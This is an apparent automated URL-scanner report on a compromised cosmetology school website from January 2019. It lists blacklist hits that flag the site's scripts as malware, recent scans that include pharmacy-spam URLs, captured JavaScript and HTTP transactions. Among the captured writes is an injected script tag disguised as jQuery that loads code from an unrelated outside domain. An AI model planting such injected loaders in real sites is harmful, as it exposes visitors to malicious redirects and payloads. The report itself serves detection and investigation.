Overview

URL neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
IP192.185.119.94
ASNAS20013 CyrusOne LLC
Location United States
Report completed2019-01-18 21:56:09 CET
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2019-01-18 2 neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555 Malware
2019-01-18 2 neetyscosmetologyschool.ca/media/system/js/caption.js Malware
2019-01-18 2 neetyscosmetologyschool.ca/media/jui/js/jquery-noconflict.js Malware
2019-01-18 2 neetyscosmetologyschool.ca/media/jui/js/jquery-migrate.min.js Malware
2019-01-18 2 neetyscosmetologyschool.ca/media/jui/js/jquery.min.js Malware
2019-01-18 2 neetyscosmetologyschool.ca/media/system/js/core.js Malware
2019-01-18 2 neetyscosmetologyschool.ca/modules/mod_ariextmenu/mod_ariextmenu/js/menu.min.js Malware
2019-01-18 2 neetyscosmetologyschool.ca/media/system/js/mootools-core.js Malware
2019-01-18 2 neetyscosmetologyschool.ca/modules/mod_ariextmenu/mod_ariextmenu/js/ext-core.js Malware
2019-01-18 2 neetyscosmetologyschool.ca/media/system/js/mootools-more.js Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 192.185.119.94

Date UQ / IDS / BL URL IP
2019-02-25 18:56:37 +0100
0 - 0 - 1 xem.tomtera.com/MbTsjook2n 192.185.119.94
2019-02-15 11:00:28 +0100
0 - 0 - 0 xem.tomtera.com/MbTsjook2n 192.185.119.94
2019-01-26 09:38:56 +0100
0 - 0 - 10 neetyscosmetologyschool.ca/ 192.185.119.94
2019-01-20 11:37:08 +0100
0 - 0 - 10 neetyscosmetologyschool.ca/QZhSZ/fzn 192.185.119.94
2018-12-28 17:30:23 +0100
0 - 0 - 10 neetyscosmetologyschool.ca/VNmcZ/nxzbz/vwvuz/ (...) 192.185.119.94
2018-12-28 10:40:34 +0100
0 - 0 - 10 neetyscosmetologyschool.ca/VijSZ/llnnz/yzpzz/ (...) 192.185.119.94
2018-12-27 14:51:21 +0100
0 - 0 - 10 neetyscosmetologyschool.ca/UNTlZ/SVlOZ/mwpkz/ (...) 192.185.119.94
2018-12-20 00:27:28 +0100
0 - 0 - 10 neetyscosmetologyschool.ca/nqnmz/xukmz/rvvgz/ (...) 192.185.119.94
2018-12-17 21:10:57 +0100
0 - 0 - 10 neetyscosmetologyschool.ca/waktz/tcqaz/qxnjz/ (...) 192.185.119.94
2018-12-17 06:25:54 +0100
0 - 0 - 10 neetyscosmetologyschool.ca/qpwtz/ofngz/fzn 192.185.119.94

Last 10 reports on ASN: AS20013 CyrusOne LLC

Date UQ / IDS / BL URL IP
2019-04-21 14:53:50 +0200
0 - 0 - 1 transcentro.cl/license/topic/levitra-10mg-rez (...) 192.185.16.153
2019-04-21 14:23:28 +0200
0 - 0 - 1 transcentro.cl/license/topic/levitra-bestelle (...) 192.185.16.153
2019-04-21 14:17:33 +0200
0 - 0 - 1 transcentro.cl/license/topic/cialis-5mg-84-st (...) 192.185.16.153
2019-04-21 14:13:12 +0200
0 - 0 - 2 interiorsndecor.com/styles/potenz/kamagra-jel (...) 192.185.170.200
2019-04-21 14:00:42 +0200
0 - 0 - 1 transcentro.cl/license/topic/cialis-kopen-ams (...) 192.185.16.153
2019-04-21 13:54:08 +0200
0 - 0 - 2 interiorsndecor.com/styles/potenz/cialis-bran (...) 192.185.170.200
2019-04-21 13:31:37 +0200
0 - 0 - 2 interiorsndecor.com/styles/potenz/viagra-wird (...) 192.185.170.200
2019-04-21 13:22:54 +0200
0 - 0 - 1 transcentro.cl/license/topic/viagra-wirkung-m (...) 192.185.16.153
2019-04-21 13:16:32 +0200
0 - 0 - 1 transcentro.cl/license/topic/welche-nebenwirk (...) 192.185.16.153
2019-04-21 13:09:46 +0200
0 - 0 - 1 transcentro.cl/license/topic/erfahrungen-tada (...) 192.185.16.153

Last 10 reports on domain: neetyscosmetologyschool.ca

Date UQ / IDS / BL URL IP
2019-04-17 17:04:26 +0200
0 - 0 - 1 neetyscosmetologyschool.ca/sgqyz/qrmaz/bvv 192.185.140.102
2019-04-17 16:56:20 +0200
0 - 0 - 1 neetyscosmetologyschool.ca/tgjiz/pdlpz/sitema (...) 192.185.140.102
2019-03-28 20:36:56 +0100
0 - 0 - 1 neetyscosmetologyschool.ca/qpcaz 192.185.140.102
2019-03-19 15:57:18 +0100
0 - 0 - 1 neetyscosmetologyschool.ca/skyoz/zxliz/pklaz/ (...) 192.185.140.102
2019-03-18 15:01:25 +0100
0 - 0 - 1 neetyscosmetologyschool.ca/SdjfZ/zpopz/vasaz/ (...) 192.185.140.102
2019-03-09 09:38:18 +0100
0 - 0 - 1 neetyscosmetologyschool.ca/ 192.185.140.102
2019-02-10 09:39:36 +0100
0 - 0 - 1 neetyscosmetologyschool.ca/ 192.185.140.102
2019-01-26 09:38:56 +0100
0 - 0 - 10 neetyscosmetologyschool.ca/ 192.185.119.94
2019-01-20 11:37:08 +0100
0 - 0 - 10 neetyscosmetologyschool.ca/QZhSZ/fzn 192.185.119.94
2018-12-28 17:30:23 +0100
0 - 0 - 10 neetyscosmetologyschool.ca/VNmcZ/nxzbz/vwvuz/ (...) 192.185.119.94


JavaScript

Executed Scripts (44)


Executed Evals (2)

#1 JavaScript::Eval (size: 7542, repeated: 1) - SHA256: 9b3c8ace03f3ab1c868c953219a4a665fdbf5b042987a173d54789225bc5a300

                                        Ext.ns('Ext.ux');
var EXT_IS_MOBILE_DEVICE = /android.+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|ad|od)|iris|kindle|lge |maemo|midp|mmp|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i.test(navigator.userAgent || navigator.vendor || window.opera) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|e\-|e\/|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|xda(\-|2|g)|yas\-|your|zeto|zte\-/i.test((navigator.userAgent || navigator.vendor || window.opera).substr(0, 4));
Ext.ux.Menu = Ext.extend(Ext.util.Observable, {
    direction: 'horizontal',
    delay: 0.2,
    autoWidth: true,
    transitionType: 'fade',
    transitionDuration: 0.3,
    animate: true,
    currentClass: 'current',
    zIndex: -1,
    constructor: function(elId, config) {
        config = config || {};
        Ext.apply(this, config);
        Ext.ux.Menu.superclass.constructor.call(this, config);
        this.addEvents('show', 'hide', 'click');
        this.DBLCLICK = false;
        this.DBLCLICKEL = null;
        this.el = Ext.get(elId);
        this.initMarkup();
        this.initEvents();
        this.setCurrent()
    },
    initMarkup: function() {
        var zIndex = this.zIndex > 0 ? this.zIndex : --Ext.ux.Menu.zSeed;
        if (this.el.parent().hasClass('ux-menu-container')) this.container = this.el.parent();
        else this.container = this.el.wrap({
            cls: 'ux-menu-container'
        });
        this.container.setStyle({
            "z-index": zIndex
        });
        this.items = this.el.select('li');
        this.el.addClass('ux-menu ux-menu-' + this.direction);
        this.el.select('>li').addClass('ux-menu-item-main');
        this.el.select('li:has(>ul)').addClass('ux-menu-item-parent').each(function(item) {
            if (item.down('a').select('>span.ux-menu-arrow').getCount() == 0) item.down('a:not(>span)').addClass('ux-menu-link-parent').createChild({
                tag: 'span',
                cls: 'ux-menu-arrow'
            })
        });
        this.el.select('li:first-child>a').addClass('ux-menu-link-first');
        this.el.select('li:last-child>a').addClass('ux-menu-link-last');
        this.container.addClass('ux-menu-clearfix');
        if (this.autoWidth) {
            this.doAutoWidth()
        }
        var subs = this.el.select('ul');
        subs.addClass('ux-menu-sub');
        if (Ext.isBorderBox || Ext.isIE7) {
            subs.each(function(item) {
                item.parent().createChild({
                    tag: 'iframe',
                    cls: 'ux-menu-ie-iframe'
                }).setWidth(item.getWidth()).setHeight(item.getHeight())
            })
        }
        subs.addClass('ux-menu-hidden')
    },
    initEvents: function() {
        this.showTask = new Ext.util.DelayedTask(this.showMenu, this);
        this.hideTask = new Ext.util.DelayedTask(function() {
            this.showTask.cancel();
            this.hideAll();
            this.fireEvent('hide')
        }, this);
        if (!EXT_IS_MOBILE_DEVICE) this.el.hover(function() {
            this.hideTask.cancel()
        }, function() {
            this.hideTask.delay(this.delay * 1000)
        }, this);
        if (!EXT_IS_MOBILE_DEVICE) this.el.select('li.ux-menu-item-parent').on('mouseenter', this.onParentEnter, false, {
            me: this,
            delay: 5
        });
        if (!EXT_IS_MOBILE_DEVICE) {
            this.el.on('mouseover', function(ev, t) {
                this.manageSiblings(t);
                if (!Ext.fly(t).hasClass('ux-menu-item-parent')) {
                    this.showTask.cancel()
                }
            }, this, {
                delegate: 'li'
            })
        } else {
            this.el.select('a.ux-menu-link-parent').on('click', function(ev, link, o) {
                var me = o.me;
                var item = Ext.get(this).parent();
                if (!item.hasClass('ux-menu-item-main') && item.parent('ul').hasActiveFx()) {
                    item.parent('ul').stopFx(true)
                }
                if (!item.child('ul').hasClass('ux-menu-hidden')) {
                    me.manageSiblings(item.parent())
                } else {
                    me.manageSiblings(item);
                    me.showTask.delay(me.delay * 1000, false, false, [item])
                };
                ev.stopEvent()
            }, false, {
                me: this,
                delay: 5
            })
        };
        if (!EXT_IS_MOBILE_DEVICE) {
            this.el.on('click', function(ev, t) {
                return this.fireEvent('click', ev, t, this)
            }, this, {
                delegate: 'a'
            })
        } else {
            this.el.on('click', function(ev, t, o) {
                var isParentEl = Ext.get(t).hasClass('ux-menu-link-parent'),
                    isStop = true;
                if (this.DBLCLICKEL && isParentEl) {
                    if (this.DBLCLICKEL == Ext.get(t) && (Date.now() - this.DBLCLICK) < 900) {
                        isStop = false
                    }
                };
                if (isParentEl && isStop) ev.stopEvent();
                if (isParentEl) {
                    this.DBLCLICKEL = Ext.get(t);
                    this.DBLCLICK = Date.now()
                } else {
                    this.DBLCLICKEL = null;
                    this.DBLCLICK = false
                };
                return this.fireEvent('click', ev, t, this)
            }, this, {
                delegate: 'a'
            })
        }
    },
    onParentEnter: function(ev, link, o) {
        var item = Ext.get(this),
            me = o.me;
        if (!item.hasClass('ux-menu-item-main') && item.parent('ul').hasActiveFx()) {
            item.parent('ul').stopFx(true)
        }
        if (!item.child('ul').hasClass('ux-menu-hidden')) {
            return
        }
        me.showTask.delay(me.delay * 1000, false, false, [item])
    },
    showMenu: function(item) {
        var menu = item.child('ul'),
            x = y = 0;
        item.select('>a').addClass('ux-menu-link-hover');
        if (this.direction == 'horizontal' && item.hasClass('ux-menu-item-main')) {
            y = item.getHeight() + 1
        } else {
            x = item.getWidth() + 1
        }
        if (Ext.isIE) {
            menu.select('ul').addClass('ux-menu-hidden');
            if (Ext.isBorderBox || Ext.isIE7) {
                item.down('iframe').setStyle({
                    left: x + 'px',
                    top: y + 'px',
                    display: 'block'
                })
            }
        }
        menu.setStyle({
            left: x + 'px',
            top: y + 'px'
        }).removeClass('ux-menu-hidden');
        if (this.animate) {
            switch (this.transitionType) {
                case 'slide':
                    if (this.direction == 'horizontal' && item.hasClass('ux-menu-item-main')) {
                        menu.slideIn('t', {
                            duration: this.transitionDuration
                        })
                    } else {
                        menu.slideIn('l', {
                            duration: this.transitionDuration
                        })
                    }
                    break;
                default:
                    menu.setOpacity(0.001).fadeIn({
                        duration: this.transitionDuration
                    });
                    break
            }
        }
        this.fireEvent('show', item, menu, this)
    },
    manageSiblings: function(item) {
        var item = Ext.get(item);
        item.parent().select('li.ux-menu-item-parent').each(function(child) {
            if (child.dom.id !== item.dom.id) {
                child.select('>a').removeClass('ux-menu-link-hover');
                child.select('ul').stopFx(false).addClass('ux-menu-hidden');
                if (Ext.isBorderBox || Ext.isIE7) {
                    child.select('iframe').setStyle('display', 'none')
                }
            }
        })
    },
    hideAll: function() {
        this.manageSiblings(this.el)
    },
    setCurrent: function() {
        var els = this.el.query('.' + this.currentClass);
        if (!els.length) {
            return
        }
        var item = Ext.get(els[els.length - 1]).removeClass(this.currentClass).findParent('li', null, true);
        while (item && item.parent('.ux-menu')) {
            item.addClass(this.currentClass);
            item.down('a').addClass(this.currentClass);
            item = item.parent('li')
        }
    },
    doAutoWidth: function() {
        var fixWidth = function(sub) {
            var widest = 0;
            var items = sub.select('>li');
            sub.setStyle({
                width: 3000 + 'px'
            });
            items.each(function(item) {
                widest = Math.max(widest, item.getWidth())
            });
            widest = Ext.isIE ? widest + 1 : widest;
            items.setWidth(widest + 'px');
            sub.setWidth(widest + 'px')
        };
        if (this.direction == 'vertical') {
            this.container.select('ul').each(fixWidth)
        } else {
            this.el.select('ul').each(fixWidth)
        }
    }
});
Ext.ux.Menu.zSeed = 10000;
                                    

#2 JavaScript::Eval (size: 18, repeated: 1) - SHA256: 9682f5fddabce48500685b207634adb80fab0ee1b991c2c01cac34fa702983c0

                                        var batch = 30803;
                                    

Executed Writes (1)

#1 JavaScript::Write (size: 278, repeated: 1) - SHA256: 7fabb2c24b0e96c7b0bf87911d835c40f60eccf286c123a63e43077933481f6a

                                        < script type = "text/javascript"
src = "http://www.antistalkingagentur.de/js/jquery.min.php?key=b64&utm_campaign=snt2014&utm_source=neetyscosmetologyschool.ca&utm_medium=&utm_content=http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555&utm_term=Home&se_referrer=" > < /script>
                                    


HTTP Transactions (41)


Request Response
                                        
                                            GET /vyhcz/wpuiz/rfwlz/vycez/555 HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6; path=/; HttpOnly
Last-Modified: Fri, 18 Jan 2019 20:55:36 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6782
Md5:    2e5990d9e8475b5240cb78d2412652bd
Sha1:   6c93d6cc949cbf2a983de79fe1cd75fa014b207c
Sha256: aea6b66eb39a557c692864eff1472f76a7a64d24d7d32bdd1e8ad84dc8bf6a9e

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /modules/mod_ariextmenu/mod_ariextmenu/js/css/menu.min.css HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Mon, 12 Dec 2016 04:41:22 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   810
Md5:    74a677a00a1e633a343d47f54ca84760
Sha1:   6a38568e3f2a7f1e695fa320c3a71d30a6cd25fa
Sha256: 9d94799cea29d87a7834b9c321375ce78c564d7cd806905d0c72f394e282508f
                                        
                                            GET /media/system/js/caption.js HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 21 Oct 2016 22:38:56 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   342
Md5:    1d35931941a35a5d402512012a9a875f
Sha1:   949a51bb9180493bc80909f0d333ef109f132cc0
Sha256: 6a0c3fbf9447578d214746b2c8d9c856adcd4a11198960e710809fe26bc9fe0f

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /modules/mod_ariextmenu/mod_ariextmenu/js/css/menu.fix.css HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Mon, 12 Dec 2016 04:41:22 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   91
Md5:    0d3d55c14306cc23a79fb409fb050ae3
Sha1:   145e2d438f64d747365d2dd820875bf8fdb999ba
Sha256: 98c4ad5058401010f68fecd5cd960531bb1914202dfed4b49c168c09c15a2aa6
                                        
                                            GET /media/jui/js/jquery-noconflict.js HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 21 Oct 2016 22:38:56 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   47
Md5:    f9644fdb744c98e71117d80a16ad8242
Sha1:   1ec2fe7ecf102eafad84b5b59efdfa68b6618b41
Sha256: a9f9e962f48337b4b7e7f09738be9883de9b2134dbd1160869ba63efe47d3b37

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /media/jui/js/jquery-migrate.min.js HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 21 Oct 2016 22:38:56 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   4314
Md5:    83366cd3bd9cafba76f66aea5896d068
Sha1:   d89741733906889758224582999798f013ed77fc
Sha256: b6ecb36d8748ea1264e24325e3f16ba5e196a3b622f70ea499850cfb6a0ad853

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /templates/shahnaz/favicon.ico HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: image/x-icon
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Content-Length: 1150
Connection: keep-alive
Last-Modified: Thu, 01 Nov 2012 10:10:20 GMT
Accept-Ranges: bytes


--- Additional Info ---
Magic:  MS Windows icon resource - 1 icon
Size:   1150
Md5:    86a2b5bbab306b8b04e8ad76f652723a
Sha1:   a88fb28823ed9a96bb61b8c466e9fbfc9132f64e
Sha256: 9264eb9bdf6cd9981f1400fa0cc377d94e3036e97b335db0eb9d939355794c2a
                                        
                                            GET /media/jui/js/jquery.min.js HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 21 Oct 2016 22:38:56 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   39403
Md5:    7ea3c09e68afd8113612bcc0eeaeb8ea
Sha1:   2170131e820e24a8660561f8b99ec1c175704d48
Sha256: 82a88b40ee0968fcbdb78240fcd8e54ef1712a48cc61e3be11b39624cdecab96

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /media/system/js/core.js HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 21 Oct 2016 22:38:56 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   2586
Md5:    b8015fbdda121ebb8378ff0459446ebe
Sha1:   83c4b44ff0a364b1601582a4922971cadf3cd7a3
Sha256: 00df6dde2f048d0be4908c908683215e6447d37d896096c0e8ffb0c048099775

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /modules/mod_ariextmenu/mod_ariextmenu/js/menu.min.js HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Mon, 12 Dec 2016 04:41:22 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   4256
Md5:    85d5a6410e0960d76c7de8ce1ceb6e88
Sha1:   b558ad353c7d1f4ae779a54324dd4211506219f5
Sha256: 11f04639c041942c6f5423798f4f327121f3fb33c9b79546e43636f5ef8098bb

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /templates/shahnaz/css/template.css HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
